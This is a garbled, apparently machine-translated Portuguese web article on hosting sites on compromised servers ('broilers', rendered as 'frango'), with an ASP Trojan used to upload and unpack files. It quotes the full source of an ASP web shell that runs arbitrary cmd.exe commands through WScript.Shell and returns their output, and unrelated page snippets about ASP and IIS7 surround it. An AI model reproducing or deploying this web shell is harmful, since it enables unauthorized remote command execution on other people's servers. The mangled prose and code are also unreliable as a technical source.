Recomendado: Como colocar seu ASP em execução em plataformas que não são de janelas Desde que a Microsoft lançou a tecnologia ASP, o ASP tem sido amplamente utilizado em sites mais e mais internet/intranet/extranet, especialmente operações de banco de dados, devido às suas poderosas funções na criação de sites interativos dinâmicos e sua simplicidade na redação do código.
Eu acho que todo mundo tem alguns frangos de corte com o porto 80. Se for doméstico, não procure segurança. Se você não quiser olhar para baixo, também pode olhar para baixo. Eu sou tão feio por tentar atrair a atenção.
A coisa mais problemática sobre colocar um site em um frango é atualizar e fazer upload de um grande número de arquivos. Os serviços de terminal são facilmente descobertos durante a luz do dia e você não está à vontade quando abre um FTP. Fui pela Internet e descobri que ela pode ser facilmente alcançada combinando o upload sem componentes e os Trojans ASP.
Todo mundo está familiarizado com o ASP Trojan. Não é nada mais que um CMD. Qual é a função? Não se preocupe, ouça -me devagar. A idéia geral é fazer upload de um programa ASP sem componente através da FTP, 139 ou Winshell. Escolhi o WebEdit (na verdade, essa não é mais uma ferramenta de upload sem componentes. Por meio dela, você pode modificar, excluir arquivos/diretórios e usá-los para atualizar páginas. Eu tenho um anúncio. Não tenho parentes com ele. Lembre -se, você precisa usar o diretório da web do frango. De fato, a maioria dos problemas pode ser resolvida, mas se houver muitos arquivos enviados um por um, será problemático. O que devo fazer? Agora o ASP Trojan é usado. Encontre um rar.exe (todos os diretórios que foram instalados com o Winrar podem ser instalados no frango. Talvez ele já esteja instalado. Se for outra ferramenta de descompressão da linha de comando, também está ok) copie -o para %Systemroot %/System32/. Carregue o arquivo .zip ou .rar no diretório da web do frango. Abra o cavalo ASP Trojan (temporariamente chamado de Trojan.asp) na barra de endereço do navegador, digite o caminho rar -x fonte.rar na caixa de texto para descomprimir com sucesso, v e lentamente, como obter o caminho absoluto (caminho) do diretório da web? Usei o método local para modificar o Trojan.asp e adicionar uma linha para converter o diretório virtual em um caminho absoluto e a saída da instrução < % = server.mappath (.) %>. Você pode alterá -lo para qualquer diretório virtual relativo à vontade.
Apenas fornece uma ideia. Se algum grande homem puder escrever uma descompressão do ASP, seria melhor, mas? Quem pode fazer isso? Eu não sei, não é? Quanto a como ocultar o diretório virtual e o suporte da exibição chinesa simplificada, não é a discussão neste artigo. O velho ditado diz, a segurança primeiro, geralmente apenas coloca um pequeno fórum ou sala de bate -papo. Se você realmente colocar uma página inicial pessoal e deixar seu endereço de contato e número de telefone para outras pessoas, não seria bom. O PS.Junesun recomenda entrar diretamente em autodecompressão, não sei se uma caixa de diálogo aparecerá.
| A seguir, o conteúdo citado: < %@ idioma = VBScript %> <% OSCRIPT DIM Dim ÓcriptNet Dim ofilesys, Ofile Dim szcmd, szTempFile Em erro de erro em seguida < ' - Crie os objetos COM que usaremos -' SET ÓSCRIP = server.createObject (wscript.shell) SET OSCRIPTNET = server.createObject (wscript.network) Conjunto OFILESYS = server.createObject (script.filesystemoBject) < ' - Verifique se há um comando que publicamos -' szcmd = request.form (.cmd) Se (szcmd <>) então < ' - use o cachimbo de um homem pobre ... um arquivo temporário -' sztempfile = c:/ & ofililesys.getTempName () Ligue para oscript.run (cmd.exe /c & szcmd & > & sztempfile, 0, true) Conjunto Ofile = Ofilesys.OpentExtFile (SzTempFile, 1, False, 0) < Final se < %> < Html > < Corpo > < Formulário Ação = < %= Request.Servervariables (URL) %> Método = Post > < Tipo de entrada = Nome do texto = .CMD Tamanho = 45 Valor = < %= SZCMD %>> < Tipo de entrada = Valor de envio = Executar > </forma > < Pre > < <% If (isobject (ofile)) então ' - Leia a saída do nosso comando e remova o arquivo temp -' Em erro de erro em seguida Response.write server.htmlencode (ofile.readall) OFILE.CLOSE Call ofilesys.deletefile (sztempfile, true) Final se %> </corpo > </html > |
Compartilhar: Target Apache IIS7 e abra seus braços para o código aberto A Microsoft imaginou as vantagens da alta modularidade do Apache. Eric Deily, gerente sênior de projetos da equipe do IIS da Microsoft, disse que eles estão trabalhando para imitar esse recurso no IIS 7.0. A maior mudança no IIS7.0 em comparação com as versões anteriores é que ela suporta várias aberturas de código aberto nativamente através do FastCGI.